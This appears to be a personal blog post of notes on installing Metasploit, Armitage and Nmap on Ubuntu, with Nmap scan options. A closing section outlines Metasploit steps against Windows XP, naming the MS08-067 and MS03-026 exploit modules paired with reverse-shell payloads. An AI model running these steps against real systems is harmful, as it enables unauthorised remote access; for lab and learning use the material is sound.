Metasploit, Armitage and NMap Install on Ubuntu 16.04

Yep, very popular hacking tools! Metasploit
Took the install from Rapid7’s site. It all went very well.

To start they had the command “./msfconsole”, which did not work for me. It started with “msfconsole”. The initial run created the initial database. The “db_status” command also worked.

I did not seem to need to do the “service postgresql start” command. I did a search and received a message: Module database cache not built yet, using slow search. To build the cache do “db_rebuild_cache”. This worked, link. Now my searches work.

search WordPress
67 WordPress vulnerabilities
search drupal
6 Drupal vulnerabilities

Armitage
downloaded from http://www.fastandeasyhacking.com. Installed into /home
Now looking for database.yml file, located in /home/.msf4 directory. Need to set MSF_DATABASE_CONFIG variable.
-set the environment variable export MSF_DATABASE_CONFIG=~/.msf4/database.yml
$ export MSF_DATABASE_CONFIG=~/.msf4/database.yml
-armitage is looking for a password in the database.yml file. edit it and the password field is blank. Add a password and save.
./armitage, and it will start up.-permanently set environment variable https://askubuntu.com/questions/58814/how-do-i-add-environment-variables https://help.ubuntu.com/community/EnvironmentVariables
-check environment variable printenv
-set in .bashrc https://www.digitalocean.com/community/tutorials/how-to-read-and-set-environmental-and-shell-variables-on-a-linux-vps

NMap
Also installed nmap with “sudo apt-get install nmap”. Excellent videos from thenewboston
nmap site-name or IP-address
States: open, filtered (firewall protected), unfiltered (cannot determine), closed (responds but no services running)

Indepth scan: OS, versions, traceroute
nmap -A
return service and version
nmap -sV
fast
nmap -F
specific ports
nmap -p number-of-port/service-name ip
Only display open ports
nmap –open
OS
nmap -O
save to a file
nmap -oN file-name
verbose
nmap -v

Win XP Exploits

search for your exploit
-find info
info exploit-name
use exploit-name
show options
set RHOST ipaddress
show payloads
set payload paste-whatever

http://www.binarytides.com/hack-windows-xp-metasploit/
MS08-067 kb958644
exploit/windows/smb/ms08_067_netapi
windows/meterpreter/reverse_tcp
check for patch kb958644

MS11-006 kb2483185

https://null-byte.wonderhowto.com/how-to/hack-like-pro-exploit-and-gain-remote-access-pcs-running-windows-xp-0134709/
exploit/windows/dcerpc/ms03_026_dcom
generic/shell_reverse_tcp

On Win XP, from dos, list system files: dir /a:hd
-send to file “dir > file-name”

Leave a Reply

Your email address will not be published. Required fields are marked *